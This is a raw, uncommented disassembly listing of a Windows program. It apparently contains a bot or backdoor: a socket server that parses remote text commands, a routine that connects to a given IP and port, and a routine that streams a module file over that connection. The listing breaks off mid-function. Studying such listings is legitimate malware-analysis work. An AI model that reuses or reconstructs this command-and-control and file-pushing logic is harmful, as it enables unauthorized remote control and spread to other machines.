loc_402D97: ; CODE XREF: seg000:00402C2E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B138
loc_402D9C: ; CODE XREF: sub_41B138+3�j
; seg000:0041B151�j ...
push 1
call sub_402FA7
retn
; END OF FUNCTION CHUNK FOR sub_41B138
; =============== S U B R O U T I N E =======================================
sub_402DA4 proc near ; CODE XREF: sub_402930+110�p
; sub_402930+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_41C228
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_402DBE
call sub_41ACA0
loc_402DBE: ; CODE XREF: sub_402DA4+13�j
test ebx, ebx
jbe short loc_402DF5
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_402F22
test al, al
jz short loc_402DF5
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_410590
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_402DF5: ; CODE XREF: sub_402DA4+1C�j
; sub_402DA4+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_402DA4 endp
; =============== S U B R O U T I N E =======================================
sub_402DFD proc near ; CODE XREF: sub_402930+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_41C228
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_402E17
call sub_41ACA0
loc_402E17: ; CODE XREF: sub_402DFD+13�j
test ebx, ebx
jbe short loc_402E4C
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_402F22
test al, al
jz short loc_402E4C
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_4105F0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_402E4C: ; CODE XREF: sub_402DFD+1C�j
; sub_402DFD+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_402DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E54 proc near ; CODE XREF: sub_402930+17C�p
; sub_41ACFA+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_402E6C
call sub_41AECC
loc_402E6C: ; CODE XREF: sub_402E54+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_402E7E
mov esi, [ebp+arg_8]
loc_402E7E: ; CODE XREF: sub_402E54+25�j
cmp edi, ebx
jnz short loc_402EA0
push ds:dword_41C228
add esi, ecx
mov ecx, edi
push esi
call sub_403018
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_403018
jmp short loc_402F19
; ---------------------------------------------------------------------------
loc_402EA0: ; CODE XREF: sub_402E54+2C�j
test esi, esi
jbe short loc_402EE3
cmp esi, eax
jnz short loc_402EE3
mov eax, [ebx+4]
test eax, eax
jnz short loc_402EB4
mov eax, offset dword_41C238
loc_402EB4: ; CODE XREF: sub_402E54+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_402EE3
push 1
mov ecx, edi
call sub_402FA7
mov eax, [ebx+4]
test eax, eax
jnz short loc_402ECF
mov eax, offset dword_41C238
loc_402ECF: ; CODE XREF: sub_402E54+74�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_402F19
; ---------------------------------------------------------------------------
loc_402EE3: ; CODE XREF: sub_402E54+4E�j
; sub_402E54+52�j ...
push 1
push esi
mov ecx, edi
call sub_402F22
test al, al
jz short loc_402F19
mov eax, [ebx+4]
test eax, eax
jnz short loc_402EFD
mov eax, offset dword_41C238
loc_402EFD: ; CODE XREF: sub_402E54+A2�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_4105F0
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [eax+esi], 0
loc_402F19: ; CODE XREF: sub_402E54+4A�j
; sub_402E54+8D�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_402E54 endp
; =============== S U B R O U T I N E =======================================
sub_402F22 proc near ; CODE XREF: sub_402930+3D�p
; sub_402DA4+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_402F34
call sub_41ACA0
loc_402F34: ; CODE XREF: sub_402F22+B�j
mov ecx, [esi+4]
xor edx, edx
cmp ecx, edx
jz short loc_402F5D
mov al, [ecx-1]
cmp al, dl
jz short loc_402F5D
cmp al, 0FFh
jz short loc_402F5D
cmp edi, edx
jnz short loc_402F98
dec al
push edx
mov [ecx-1], al
loc_402F52: ; CODE XREF: sub_402F22+47�j
mov ecx, esi
call sub_402FA7
loc_402F59: ; CODE XREF: sub_402F22+4B�j
; sub_402F22+52�j
xor al, al
jmp short loc_402FA2
; ---------------------------------------------------------------------------
loc_402F5D: ; CODE XREF: sub_402F22+19�j
; sub_402F22+20�j ...
cmp edi, edx
jnz short loc_402F76
cmp [esp+8+arg_4], dl
jz short loc_402F6B
push 1
jmp short loc_402F52
; ---------------------------------------------------------------------------
loc_402F6B: ; CODE XREF: sub_402F22+43�j
cmp ecx, edx
jz short loc_402F59
mov [esi+8], edx
mov [ecx], dl
jmp short loc_402F59
; ---------------------------------------------------------------------------
loc_402F76: ; CODE XREF: sub_402F22+3D�j
cmp [esp+8+arg_4], dl
jz short loc_402F93
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_402F88
cmp eax, edi
jnb short loc_402FA0
loc_402F88: ; CODE XREF: sub_402F22+60�j
push 1
mov ecx, esi
call sub_402FA7
jmp short loc_402F98
; ---------------------------------------------------------------------------
loc_402F93: ; CODE XREF: sub_402F22+58�j
cmp [esi+0Ch], edi
jnb short loc_402FA0
loc_402F98: ; CODE XREF: sub_402F22+28�j
; sub_402F22+6F�j
push edi
mov ecx, esi
call sub_40307F
loc_402FA0: ; CODE XREF: sub_402F22+64�j
; sub_402F22+74�j
mov al, 1
loc_402FA2: ; CODE XREF: sub_402F22+39�j
pop edi
pop esi
retn 8
sub_402F22 endp
; =============== S U B R O U T I N E =======================================
sub_402FA7 proc near ; CODE XREF: sub_402930+1F�p
; sub_402930+16A�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_402FD3
mov eax, [esi+4]
test eax, eax
jz short loc_402FD3
lea ecx, [eax-1]
mov al, [eax-1]
test al, al
jz short loc_402FCC
cmp al, 0FFh
jz short loc_402FCC
dec al
mov [ecx], al
jmp short loc_402FD3
; ---------------------------------------------------------------------------
loc_402FCC: ; CODE XREF: sub_402FA7+19�j
; sub_402FA7+1D�j
push ecx
call sub_4112BF
pop ecx
loc_402FD3: ; CODE XREF: sub_402FA7+8�j
; sub_402FA7+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_402FA7 endp
; =============== S U B R O U T I N E =======================================
sub_402FE3 proc near ; CODE XREF: seg000:00402CCB�p
; sub_40313C+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
mov esi, ecx
push edi
call sub_402F22
test al, al
jz short loc_403011
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_4105F0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_403011: ; CODE XREF: sub_402FE3+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_402FE3 endp
; =============== S U B R O U T I N E =======================================
sub_403018 proc near ; CODE XREF: sub_402E54+39�p
; sub_402E54+45�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40302B
call sub_41AECC
loc_40302B: ; CODE XREF: sub_403018+C�j
mov ecx, edi
call sub_40313C
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_403041
mov ebx, eax
loc_403041: ; CODE XREF: sub_403018+25�j
test ebx, ebx
jbe short loc_403077
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_4112D0
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_402F22
test al, al
jz short loc_403077
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_403077: ; CODE XREF: sub_403018+2B�j
; sub_403018+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_403018 endp
; =============== S U B R O U T I N E =======================================
sub_40307F proc near ; CODE XREF: sub_402F22+79�p
mov eax, offset loc_41B180
call sub_4112A0
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_4030A5
mov edi, [ebp+8]
loc_4030A5: ; CODE XREF: sub_40307F+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_4030B2
xor eax, eax
loc_4030B2: ; CODE XREF: sub_40307F+2F�j
push eax
call sub_411605
pop ecx
mov [ebp+8], eax
jmp short loc_4030E3
; ---------------------------------------------------------------------------
loc_4030BE: ; DATA XREF: seg001:0041CEEC�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_4030CD
xor eax, eax
loc_4030CD: ; CODE XREF: sub_40307F+4A�j
push eax
call sub_411605
mov [ebp+8], eax
pop ecx
mov eax, offset loc_4030DD
retn
; ---------------------------------------------------------------------------
loc_4030DD: ; DATA XREF: sub_40307F+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_4030E3: ; CODE XREF: sub_40307F+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_403101
cmp eax, edi
jbe short loc_4030F0
mov eax, edi
loc_4030F0: ; CODE XREF: sub_40307F+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_4105F0
add esp, 0Ch
loc_403101: ; CODE XREF: sub_40307F+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_402FA7
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_403121
mov edi, ebx
loc_403121: ; CODE XREF: sub_40307F+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [eax+edi], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40307F endp
; =============== S U B R O U T I N E =======================================
sub_40313C proc near ; CODE XREF: sub_403018+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_403169
mov al, [esi-1]
test al, al
jz short loc_403169
cmp al, 0FFh
jz short loc_403169
push 1
call sub_402FA7
push esi
call sub_410B60
pop ecx
push eax
push esi
mov ecx, edi
call sub_402FE3
loc_403169: ; CODE XREF: sub_40313C+9�j
; sub_40313C+10�j ...
pop edi
pop esi
retn
sub_40313C endp
; ---------------------------------------------------------------------------
test ds:byte_45FB30, 1
jnz short loc_40317C
or ds:byte_45FB30, 1
loc_40317C: ; CODE XREF: seg000:00403173�j
jmp $+5
push offset nullsub_1
call sub_411680
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40318D proc near ; DATA XREF: seg000:00405220�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_41C198 ; WSAStartup
push edi
call sub_411914
push eax
call sub_41055D
push 0FA00h
push 471h
call sub_40F6B3
add esp, 10h
mov ds:dword_42F3F0, eax
push edi
push ebx
push 2
call ds:dword_41C1C0 ; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_41C19C ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_41C1A0 ; ioctlsocket
mov ax, word ptr ds:dword_42F3F0
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_41C1BC ; ntohs
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_41C1A4 ; bind
test eax, eax
jge short loc_403262
mov eax, ebx
jmp loc_403789
; ---------------------------------------------------------------------------
loc_403262: ; CODE XREF: sub_40318D+CC�j
push 0Ah
push esi
call ds:dword_41C1A8 ; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_41C1CC
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_403280: ; CODE XREF: sub_40318D+12C�j
; sub_40318D+5F4�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_41C1B0 ; select
cmp eax, 0FFFFFFFFh
jz loc_403786
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_403280
loc_4032BB: ; CODE XREF: sub_40318D+5EE�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_410590
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_410590
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_41AFF8 ; __WSAFDIsSet
test eax, eax
jz loc_403774
cmp edi, [ebp+var_C]
jnz short loc_403372
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_41C1AC ; accept
cmp eax, 0FFFFFFFFh
jz loc_403774
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_40333C
lea edx, [ebp+var_224]
loc_40332C: ; CODE XREF: sub_40318D+1AD�j
cmp [edx], eax
jz short loc_40333C
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_40332C
loc_40333C: ; CODE XREF: sub_40318D+197�j
; sub_40318D+1A1�j
cmp ecx, [ebp+var_228]
jnz short loc_40335A
cmp [ebp+var_228], 40h
jnb short loc_40335A
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_40335A: ; CODE XREF: sub_40318D+1B5�j
; sub_40318D+1BE�j
cmp eax, [ebp+var_4]
jle short loc_403362
mov [ebp+var_4], eax
loc_403362: ; CODE XREF: sub_40318D+1D0�j
push esi
push 15h
push offset dword_41F648
push eax
call ebx ; send
jmp loc_403774
; ---------------------------------------------------------------------------
loc_403372: ; CODE XREF: sub_40318D+169�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call ds:dword_41C1C8 ; recv
test eax, eax
jg short loc_4033D9
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_4033CD
lea eax, [ebp+var_224]
loc_403399: ; CODE XREF: sub_40318D+216�j
cmp [eax], edi
jz short loc_4033A7
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_403399
jmp short loc_4033CD
; ---------------------------------------------------------------------------
loc_4033A7: ; CODE XREF: sub_40318D+20E�j
dec edx
cmp ecx, edx
jnb short loc_4033C7
lea eax, [ebp+ecx*4+var_224]
loc_4033B3: ; CODE XREF: sub_40318D+238�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_4033B3
loc_4033C7: ; CODE XREF: sub_40318D+21D�j
dec [ebp+var_228]
loc_4033CD: ; CODE XREF: sub_40318D+204�j
; sub_40318D+218�j
push edi
call ds:dword_41C1D0 ; closesocket
jmp loc_403774
; ---------------------------------------------------------------------------
loc_4033D9: ; CODE XREF: sub_40318D+1F8�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset dword_41F640
push eax
call sub_4118E0
lea eax, [ebp+var_AC]
push offset dword_41F638
push eax
call sub_410930
add esp, 18h
test eax, eax
jnz short loc_40341D
push esi
push 16h
push offset dword_41F620
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_40341D: ; CODE XREF: sub_40318D+281�j
lea eax, [ebp+var_AC]
push offset dword_41F618
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403441
push esi
push 14h
push offset dword_41F600
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_403441: ; CODE XREF: sub_40318D+2A5�j
lea eax, [ebp+var_AC]
push offset dword_41F5F8
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403465
push esi
push 0Dh
push offset dword_41F5E8
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_403465: ; CODE XREF: sub_40318D+2C9�j
lea eax, [ebp+var_AC]
push offset dword_41F5E0
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403489
push esi
push 10h
push offset dword_41F5CC
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_403489: ; CODE XREF: sub_40318D+2ED�j
lea eax, [ebp+var_AC]
push offset dword_41F5C8
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4034AD
push esi
push 1Eh
push offset dword_41F5A8
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_4034AD: ; CODE XREF: sub_40318D+311�j
lea eax, [ebp+var_AC]
push offset dword_41F5A0
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4034E8
lea eax, [ebp+var_334]
push offset dword_41F59C
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4034E8
push esi
push 13h
push offset dword_41F588
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_4034E8: ; CODE XREF: sub_40318D+335�j
; sub_40318D+34C�j
lea eax, [ebp+var_AC]
push offset dword_41F5A0
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403523
lea eax, [ebp+var_334]
push offset dword_41F584
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403523
push esi
push 13h
push offset dword_41F570
jmp loc_40375F
; ---------------------------------------------------------------------------
loc_403523: ; CODE XREF: sub_40318D+370�j
; sub_40318D+387�j
lea eax, [ebp+var_AC]
push offset dword_41F568
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403571
push 0Ah
mov esi, offset dword_41F53C
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_124]
loc_403561: ; CODE XREF: sub_40318D+423�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_403569: ; CODE XREF: sub_40318D+4F3�j
mov edi, [ebp+arg_0]
jmp loc_403762
; ---------------------------------------------------------------------------
loc_403571: ; CODE XREF: sub_40318D+3AB�j
lea eax, [ebp+var_AC]
push offset dword_41F534
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4035B2
push 5
mov esi, offset dword_41F51C
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_403561
; ---------------------------------------------------------------------------
loc_4035B2: ; CODE XREF: sub_40318D+3F9�j
lea eax, [ebp+var_AC]
push offset dword_41F514
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_403685
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset dword_41F4EC
push eax
call sub_4118E0
lea eax, [ebp+var_F8]
push eax
call sub_410A7F
mov edi, eax
lea eax, [ebp+var_2D0]
push eax
call sub_410A7F
mov [ebp+var_8], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_410590
push [ebp+var_8]
lea eax, [ebp+var_F8]
push edi
push offset dword_41F4E4
push eax
call sub_41050B
add esp, 44h
lea eax, [ebp+var_F8]
push 10h
push esi
push eax
call sub_4118C9
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset dword_41F4D8
push eax
call sub_41050B
add esp, 24h
push esi
push 1Dh
push offset dword_41F4B8
push [ebp+arg_0]
call ebx ; send
jmp loc_403569
; ---------------------------------------------------------------------------
loc_403685: ; CODE XREF: sub_40318D+43A�j
lea eax, [ebp+var_AC]
push offset dword_41F4B0
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_403740
push esi
push 28h
push offset dword_41F484
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_403790
pop ecx
cmp eax, 1
pop ecx
jnz short loc_403736
call sub_40380D
cmp eax, 1
jnz loc_403762
push esi
push 17h
push offset dword_41F46C
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push ds:dword_42F3F0
push eax
lea eax, [ebp+var_8DC]
push offset dword_41F40C
push eax
call sub_41050B
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_403727
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40E367
add esp, 14h
loc_403727: ; CODE XREF: sub_40318D+575�j
lea eax, [ebp+var_8DC]
push eax
call sub_407E0E
pop ecx
jmp short loc_403762
; ---------------------------------------------------------------------------
loc_403736: ; CODE XREF: sub_40318D+52F�j
push esi
push 20h
push offset dword_41F3E8
jmp short loc_40375F
; ---------------------------------------------------------------------------
loc_403740: ; CODE XREF: sub_40318D+50D�j
lea eax, [ebp+var_AC]
push offset dword_41F3E0
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_403762
push esi
push 1Bh
push offset dword_41F3C4
loc_40375F: ; CODE XREF: sub_40318D+28B�j
; sub_40318D+2AF�j ...
push edi
call ebx ; send
loc_403762: ; CODE XREF: sub_40318D+3DF�j
; sub_40318D+539�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_410590
add esp, 0Ch
loc_403774: ; CODE XREF: sub_40318D+160�j
; sub_40318D+189�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_4032BB
jmp loc_403280
; ---------------------------------------------------------------------------
loc_403786: ; CODE XREF: sub_40318D+11E�j
push 1
pop eax
loc_403789: ; CODE XREF: sub_40318D+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40318D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403790 proc near ; CODE XREF: sub_40318D+525�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_41C198 ; WSAStartup
push 0
push 1
push 2
call ds:dword_41C1C0 ; socket
push [ebp+arg_0]
mov ds:dword_42F3EC, eax
mov [ebp+var_10], 2
call ds:dword_41C1B8 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_41C1BC ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_42F3EC
call ds:dword_41C1C4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_403808
push ds:dword_42F3EC
call ds:dword_41C1D0 ; closesocket
call ds:dword_41C194 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403808: ; CODE XREF: sub_403790+60�j
push 1
pop eax
leave
retn
sub_403790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40380D proc near ; CODE XREF: sub_40318D+531�p
var_1037B = byte ptr -1037Bh
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call near ptr 3D0000h
or [ebp+var_1037B], 0FFh
push offset dword_41F660
push eax
call sub_411B4E
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4038A4
test byte ptr [esi+0Ch], 10h
jnz short loc_403888
push edi
mov edi, 400h
loc_403850: ; CODE XREF: sub_40380D+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_411A46
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_42F3EC
call ds:dword_41C1CC ; send
push 1
call ds:dword_41C058 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_403850
pop edi
loc_403888: ; CODE XREF: sub_40380D+3B�j
push esi
call sub_4119F0
pop ecx
push ds:dword_42F3EC
call ds:dword_41C1D0 ; closesocket
call ds:dword_41C194 ; WSACleanup
push 1
pop eax
loc_4038A4: ; CODE XREF: sub_40380D+35�j
pop esi
leave
retn
sub_40380D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; DATA XREF: seg000:0040532D�o
; seg000:0040D909�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_410BE0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_410590
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_430794
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_430810
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_403C92
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov ds:dword_4358E4[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4307C0
cmp eax, 0FFFFFFFFh
jz loc_403C92
push 7FFFFFFFh
push edi
call ds:dword_4307BC
cmp eax, 0FFFFFFFFh
jz loc_403C92
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_43082C
cmp eax, 0FFFFFFFFh
jz loc_403C92
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40397E: ; CODE XREF: sub_4038A7+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
